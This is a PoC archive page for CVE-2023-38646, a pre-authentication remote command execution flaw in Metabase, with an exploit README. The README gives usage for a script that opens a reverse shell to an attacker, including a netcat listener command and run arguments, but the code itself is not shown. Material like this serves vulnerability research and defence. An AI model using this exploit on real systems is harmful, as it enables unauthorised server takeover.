Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-38646 PoC — Metabase 安全漏洞

Source
Associated Vulnerability
Title:Metabase 安全漏洞 (CVE-2023-38646)
Description:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
Description
Metabase Pre-Auth RCE POC
Readme
# Metabase Pre-Auth RCE POC - CVE-2023-38646
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server. I have written the script directly to gain reverse shell on the attacker's machine.

## Usage
The script require the Target URL, Attackers IP and Port. Providing the setup token is not required for this exploit as the script tries to obtain it from `/api/session/properties`.

Make sure to start netcat listener on Attacker machine, using the following command : 
`nc -nlvp {Port}`

Run the POC Script with:
- -u  - Target URL (Metabase)
- -ip  - Attacker IP
- -p  - Port Number  
```python
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
```
 
 
 
![POC](https://i.imgur.com/BE7nuAml.png)

## References
- https://github.com/m3m0o/metabase-pre-auth-rce-poc/
- https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
File Snapshot

[4.0K] /data/pocs/b0c3b12014f5fe41340e2af2397f1e8ad7aa8a96 ├── [1.9K] CVE-2023-38646.py └── [ 917] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.